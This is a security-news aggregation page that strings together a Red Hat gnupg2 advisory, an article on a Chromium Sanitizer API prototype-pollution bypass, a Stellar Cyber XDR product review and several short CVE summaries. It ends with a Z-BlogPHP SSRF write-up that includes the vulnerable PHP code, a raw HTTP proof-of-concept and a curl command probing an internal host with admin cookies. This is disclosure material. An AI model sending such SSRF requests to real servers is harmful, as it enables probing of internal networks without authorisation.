Y+pSNtUHMRm7d3CA/VsfS7cAyLMiqrLE7StwSj0DkPT/Tz4LCUXy5TkCy4rTB7Bg  
cwNdK2d/JB0zpKmi1K1YguA5dYAClxMF4SEy2EwwlbL62wZUzsyMuOOyXq9aStlE  
ILicD7q9fjhDKEAodB5y2/XoB6xUpbszrT7dOjvwMs9FrthdNLeOvB91/aCt/tcF  
wRVOZr938yc=  
=OoQv  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6634-01

Red Hat Security Advisory 2022-6602-01 - The GNU Privacy Guard is a tool for encrypting data and creating digital signatures, compliant with OpenPGP and S/MIME standards. Issues addressed include a spoofing vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Moderate: gnupg2 security update  
Advisory ID:       RHSA-2022:6602-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:6602  
Issue date:        2022-09-20  
CVE Names:         CVE-2022-34903   
=====================================================================

1. Summary:

An update for gnupg2 is now available for Red Hat Enterprise Linux 9.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 9) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 9) - aarch64, ppc64le, s390x, x86_64

3. Description:

The GNU Privacy Guard (GnuPG or GPG) is a tool for encrypting data and  
creating digital signatures, compliant with OpenPGP and S/MIME standards.

Security Fix(es):

* gpg: Signature spoofing via status line injection (CVE-2022-34903)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2102868 - CVE-2022-34903 gpg: Signature spoofing via status line injection

6. Package List:

Red Hat Enterprise Linux AppStream (v. 9):

aarch64:  
gnupg2-debuginfo-2.3.3-2.el9_0.aarch64.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.aarch64.rpm  
gnupg2-smime-2.3.3-2.el9_0.aarch64.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.aarch64.rpm

ppc64le:  
gnupg2-debuginfo-2.3.3-2.el9_0.ppc64le.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.ppc64le.rpm  
gnupg2-smime-2.3.3-2.el9_0.ppc64le.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.ppc64le.rpm

s390x:  
gnupg2-debuginfo-2.3.3-2.el9_0.s390x.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.s390x.rpm  
gnupg2-smime-2.3.3-2.el9_0.s390x.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.s390x.rpm

x86_64:  
gnupg2-debuginfo-2.3.3-2.el9_0.x86_64.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.x86_64.rpm  
gnupg2-smime-2.3.3-2.el9_0.x86_64.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 9):

Source:  
gnupg2-2.3.3-2.el9_0.src.rpm

aarch64:  
gnupg2-2.3.3-2.el9_0.aarch64.rpm  
gnupg2-debuginfo-2.3.3-2.el9_0.aarch64.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.aarch64.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.aarch64.rpm

ppc64le:  
gnupg2-2.3.3-2.el9_0.ppc64le.rpm  
gnupg2-debuginfo-2.3.3-2.el9_0.ppc64le.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.ppc64le.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.ppc64le.rpm

s390x:  
gnupg2-2.3.3-2.el9_0.s390x.rpm  
gnupg2-debuginfo-2.3.3-2.el9_0.s390x.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.s390x.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.s390x.rpm

x86_64:  
gnupg2-2.3.3-2.el9_0.x86_64.rpm  
gnupg2-debuginfo-2.3.3-2.el9_0.x86_64.rpm  
gnupg2-debugsource-2.3.3-2.el9_0.x86_64.rpm  
gnupg2-smime-debuginfo-2.3.3-2.el9_0.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-34903  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBYypfX9zjgjWX9erEAQiOvhAAhVRPZMa292T4ShXZAj/q0CrQorvNe2nQ  
yvOLbVmhP1hoGNczgXjCCaO8j72n2ZW4jDW1Y+iTIwdthKUWBp8+OjAJOeVjUuex  
8BWX36sbIND6cNaRPhdayAaMt23nTkOqEKOHZQiAVkGdZefRQm0NCEnutsaGxc4f  
9zg90wOrO3NCpIY5BbSqoa/yRPShL9c/myjeqngmaeviuDY435+cH+mRJtHiIEee  
RJld/ltoOoGwJSMiNr4fXLoFuPAYlSKvKYf4NPehRve3ykdgm492NIZgtSFcZs5I  
XkjmMJGqNHP6Q0a5+3Z89j1sFZR8uXH+sV0ZpW7RsdRqnzZULuXjBIv/8d3sZywM  
mxruNtaYOsmIh8uUzvkd2c/2gUKjKv9pO2o/Au4nq6dE1axWy1WLEvTUztk5sZ8N  
d0/y4t904ABz6u5aYADoObmCyULEkjY75FAcyzl6Zvayw9/SJH52pOPgYLzqR8Tu  
wOOgVdFtQju+5/ASzpuVnN6AjxcrBsTvEKOBI8zHTqlzaq6QpaZlO8etdcc2TXHV  
eVdSzlBbt0aZuqxhJD+y0N4N9/Oapq2JFjyaF6pac8wrcRrX8/j5FoOQPE/P4OOI  
qBGwF5WhU53uRoXYEMGT4GrgQfyuQypCbUUjTSkxcI4bidX3U2e5iT0cg4Kjv7qK  
tqtXxkGaWqc=  
=ep9h  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-6602-01

Issue highlights the challenges of preventing client-side attacks

Issue highlights the challenges of preventing client-side attacks

  

A prototype pollution bug in the Chromium project allowed attackers to bypass Sanitizer API, a built-in browser library for removing potentially malicious code from user-controlled input sources.

Prototype pollution is a type of JavaScript vulnerability that allows attackers to exploit the rules of the programming language to change an application’s behavior and compromise it in various ways.

Reported by security researcher Michał Bentkowski, the bug highlights the challenges of preventing client-side prototype pollution attacks.

**Client-side prototype pollution**

Prototype pollution can happen both on the client side (browser) and server side (Node.js servers). Bentkowski, who has done extensive research on the topic, discovered the new bug while exploring client-side prototype pollution vulnerabilities in Chromium.

The Sanitizer API was added to Chromium browsers to support native sanitization as a replacement for third-party libraries such as DOMPurify.

According to Bentkowski’s findings, if the JavaScript object Sanitizer is instantiated with an empty object as argument, it will trigger an internal mechanism that bypasses the sanitization flow. Bentkowski told The Daily Swig that the empty object causes the browser “to traverse the prototype chain”.

BACKGROUND Prototype pollution: The dangerous and underrated flaw impacting JavaScript applications

As proof of concept, Bentkowski showed that the API misses sanitizing a JavaScript snippet embedded in an SVG object. Once the supposedly sanitized SVG is inserted into the page, the JavaScript code is executed.

In his report, Bentkowski notes that for the vulnerability to work, the browser’s must be enabled.

“My guess is that there’s a low amount of people with this flag enabled,” Bentkowski said. “However, the Sanitizer API is enabled by default in Chrome 105 (released at the end of August), so the impacted user base is now greater.”

**Bug or feature?**

The discussion thread on the Chromium bug tracker shows some of the complexities of drawing the boundaries on prototype pollution bugs. Manipulating prototypes is one of the features that make JavaScript flexible and versatile, which means that hardening applications against prototype pollution attacks will always require meticulous efforts by web developers.

As one security researcher noted in the discussion thread, the prototype pollution vector is not something that should be addressed in Sanitizer API.

“Environments that have their Object prototypes polluted are already compromised, and I don’t think selectively hardening chosen web APIs against that would offer much practical benefit, and it may only offer a false sense of security, at the expense of API cognitive complexity,” the researcher wrote.

“Before reporting the bug I was unaware that there exists a WebIDL spec that specifically defines that the prototype chain must be traversed by Web APIs,” Bentkowski said.

“This means that in fact, it is a feature, and this cannot be changed right now because that would be backward-incompatible; that is, many applications would be broken.”

Developers, therefore, need to identify and remove all gadgets that pollute prototypes from user-controlled sources.

Nonetheless, Bentkowski’s discovery did result in some fixes. “\[The bug\] only worked on the SVG example. In the end, this was the real bug in the submission,” he said.

“Prototype pollution by itself was considered a ‘feature’. However, it shouldn’t have been possible to bypass the Sanitizer by the specially constructed configuration object.”

DON’T MISS Uber hack linked to hardcoded secrets spotted in PowerShell script

Prototype pollution bug in Chromium bypassed Sanitizer API

Almost every vendor, from email gateway companies to developers of threat intelligence platforms, is positioning themselves as an XDR player. But unfortunately, the noise around XDR makes it harder for buyers to find solutions that might be right for them or, more importantly, avoid ones that don't meet their needs. 
Stellar Cyber delivers an Open XDR solution that allows organizations to use

Almost every vendor, from email gateway companies to developers of threat intelligence platforms, is positioning themselves as an XDR player. But unfortunately, the noise around XDR makes it harder for buyers to find solutions that might be right for them or, more importantly, avoid ones that don't meet their needs.

Stellar Cyber delivers an Open XDR solution that allows organizations to use whatever security tools they desire in their security stack, feeding alerts and logs into Stellar Cyber. Stellar Cyber's "Open" approach means their platform can work with any product. As a result, a security team can make changes without wondering if the Stellar Cyber Open XDR platform will still work.

Stellar Cyber address the needs of lean enterprise security teams by providing capabilities typically found in NG-SIEM, NDR, and SOAR products in their Open XDR platform, managed by a single license. This consolidation enables customers to eliminate security stack complexity.

Stellar Cyber services customers in all major industries, with customers across Europe, Asia, Australia, Japan, South Korea, and Africa, providing security for over 3 million assets. In addition, Stellar Cyber claims after deployment, users see up to 20x faster mean time to respond (MTTR), a bold claim.

**Responding to an Incident from the Home page**

When logging into Stellar Cyber, the initial screen is the analyst home screen, showing stats such as top incidents and riskiest assets. An interesting piece on this screen is what Stellar Cyber calls the Open XDR Kill Chain. Clicking on any segment of the kill chain, such as "Initial Attempts," shows threats associated with that portion of the attack chain.

For example, the user can see these alerts with the stage "Initial Attempts" set by Stellar Cyber automatically. The user can see more information about the alert by clicking on "View" on any of the alerts. Then, scrolling down the screen, the user can click the "more info" hyperlink to see more information about the selected alert.

Here a user can read about the incident, review the details, and see the raw data behind this incident and the JSON, which is copiable to a clipboard if necessary. In addition, by clicking the "Actions" button, the user can see other powerful platform features.

The user can take response actions from this screen, such as "add a filter, trigger an email, or take external action. Clicking on external action shows an additional picklist. The user can click on Endpoint to see the action options from contain host to shutdown host.

When clicking on an action, like contain host, a configuration dialog displays where the user can select the connector to use, the target of the action, and any other options required to initiate the action chosen. In summary, security analysts, especially junior ones, will find this workflow very useful in that they can a) quickly review details of an incident from the home screen, b) see even more details by going further into the data, and c) take a remediation action from this screen without writing any scripts or code.

The enterprise can help onboard new analysts by having them work on this view to familiarize them with the platform, handling low-priority incidents so other analysts can work on the more critical incidents.

****Exploring Incidents****

Instead of clicking on the Open XDR Kill Chain, if the user clicks "Incidents," the screen below is shown.

When the user clicks on the carrot in the blue circle, a filtering list enables a user to hone in on a specific type of incident. The user can go directly to the details button to see what is in this detail view.

The user can see how this incident occurred and propagated across multiple assets. Further, the user can automatically see the files, processes, users, and services associated with the incident. So, for example, the user could switch to the timeline view to get a readable history of this incident.

And click the small "i" to get to the detail screen shown previously.

In summary, analysts who are used to working from a list of alerts may like to start their investigations from the incidents page. This view is also beneficial as it automatically shows all alerts associated with this incident in a single view.

****Threat Hunting in Stellar Cyber****

Users can initiate a threat hunt from the screen above. The stats on the screen change dynamically by typing in a term, such as "login," in the search dialog. Then, scrolling down the screen, users can see a list of alerts filtered based on the search term.

Users can create a "correlation search" under the search dialog box.

Users can load a saved query or add a new query. Clicking the add query, the user can see this query builder. This builder enables a search across the Stellar Cyber datastores for threats that went unnoticed. Here the user can also access the threat hunting library.

Finally, the user can create response actions that automatically execute if the query returns matches.

In summary, Stellar Cyber offers a simple threat-hunting platform that doesn't require users to build their own ELK stack or be a power scripter. This feature is an easy way to add a threat-hunting element to a security team without hiring a senior threat hunter.

****Conclusion****

Stellar Cyber is a solid security operations platform with many features that could help a security team improve productivity. If in the market for a new SecOps platform and open to adopting (in whole or part) a new approach to security, it is worth looking at what Stellar Cyber offers. To learn more about Stellar Cyber, try the 5-minute product tour.

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Product Review: Stellar Cyber Open XDR Platform

SmartVista SVFE2 v2.2.22 was discovered to contain a SQL injection vulnerability via the UserForm:j_id90 parameter at /SVFE2/pages/feegroups/mcc_group.jsf.

An attacker requires an account on the SmartVista SVFE2. An attacker can use a quote character to break query string and inject sql payload to "UserForm:j\_id90" parameter in /SVFE2/pages/feegroups/mcc\_group.jsf. Response data could help an attacker identify whether an injected SQL query is correct or not.

CVE-2022-38619: SQL Injection in Terminal MCC Group feature of SmartVista SVFE2 version 2.2.22 (CVE-2022-38619)

Prototype pollution vulnerability in stealjs steal via the alias variable in babel.js.

**steal vulnerable to Prototype Pollution via alias variable**

Moderate severity GitHub Reviewed Published Sep 21, 2022 • Updated Sep 21, 2022

GHSA-wc4x-qmr2-rj8h: steal vulnerable to Prototype Pollution via alias variable

A Regular Expression Denial of Service (ReDoS) flaw was found in stealjs steal 2.2.4 via the string variable in babel.js.

**steal Inefficient Regular Expression Complexity vulnerability via string variable**

Moderate severity GitHub Reviewed Published Sep 21, 2022 • Updated Sep 21, 2022

GHSA-rgqx-226f-2xp4: steal Inefficient Regular Expression Complexity vulnerability via string variable

A security issue was discovered in Z-BlogPHP <= 1.7.2. A Server-Side Request Forgery (SSRF) vulnerability in the zb_users/plugin/UEditor/php/action_crawler.php file allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.

A Server-Side Request Forgery (SSRF) in action\_crawler.php file of Z-BlogPHP allows remote attackers to force the application to make arbitrary requests via injection of arbitrary URLs into the source parameter.

Test Environment: Ubuntu and PHP 7.2  
Impact version: Z-BlogPHP <= 1.7.2

// zb\_users/plugin/UEditor/php/controller.php
$action = $\_GET\['action'\];

switch ($action) {
    case 'config':
        $result = json\_encode($CONFIG);
        break;

    /\* 上传图片 \*/
    case 'uploadimage':
    /\* 上传涂鸦 \*/
    case 'uploadscrawl':
    /\* 上传视频 \*/
    case 'uploadvideo':
    /\* 上传文件 \*/
    case 'uploadfile':
        $result = include "action\_upload.php";
        break;

    /\* 抓取远程文件 \*/
    case 'catchimage':
        $result = include "action\_crawler.php";
        break;

    default:
        $result = json\_encode(array(
            'state' => '请求地址出错',
        ));
        break;
}

//zb\_users/plugin/UEditor/php/action\_crawler.php

foreach ($source as $imgUrl) {
    $item = new Uploader($imgUrl, $config, "remote");
    $info = $item\->getFileInfo();
    array\_push($list, array(
        "state"    => $info\["state"\],
        "url"      => $info\["url"\],
        "size"     => $info\["size"\],
        "title"    => htmlspecialchars($info\["title"\]),
        "original" => htmlspecialchars($info\["original"\]),
        "source"   => htmlspecialchars($imgUrl),
    ));
}

// zb\_users/plugin/UEditor/php/Uploader.class.php

public function \_\_construct($fileField, $config, $type = "upload")
{
    global $zbp;
    $this\->stateMap\['ERROR\_TYPE\_NOT\_ALLOWED'\] = $zbp\->lang\['error'\]\['26'\];
    $this\->stateMap\['ERROR\_SIZE\_EXCEED'\] = $zbp\->lang\['error'\]\['27'\];
    $this\->stateMap\['ERROR\_UNKNOWN'\] = $zbp\->lang\['error'\]\['0'\];
    $this\->fileField = $fileField;
    $this\->config = $config;
    $this\->type = $type;
    if ($type == "remote") {
        $this\->saveRemote();
    }
    ...
    
    ...

private function saveRemote()
{
    global $zbp;
    $imgUrl = htmlspecialchars($this\->fileField);
    $imgUrl = str\_replace("&amp;", "&", $imgUrl);

    //http开头验证
    if (strpos($imgUrl, "http") !== 0) {
        $this\->stateInfo = $this\->getStateInfo("ERROR\_HTTP\_LINK");

        return;
    }
    //获取请求头并检测死链
    $heads = get\_headers($imgUrl, 1);
    ...

Because the source parameter is unrestricted, it is also possible to use the server side to send requests, such as probing intranet web services. The corresponding PoC is as follows

    GET /zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz HTTP/1.1
    Host: 172.16.119.145
    Cookie: timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D
    Connection: close
    

You can also use the following curl command to verify the vulnerability

    curl -i -s -k -X $'GET' \
        -H $'Host: 172.16.119.145' -H $'Connection: close' \
        -b $'timezone=8; username=admin; token=eec828fbf6857c2620e0bcd3d128a142e225dbaaac76572657c30d36b0df0a861665059400; addinfozblog=%7B%22chkadmin%22%3A1%2C%22chkarticle%22%3A1%2C%22levelname%22%3A%22%5Cu7ba1%5Cu7406%5Cu5458%22%2C%22userid%22%3A%221%22%2C%22useralias%22%3A%22admin%22%7D' \
        $'http://172.16.119.145/zblog/zb_users/plugin/UEditor/php/controller.php?action=catchimage&source[1]=http://172.16.119.1/zfuzz'

Tag

#js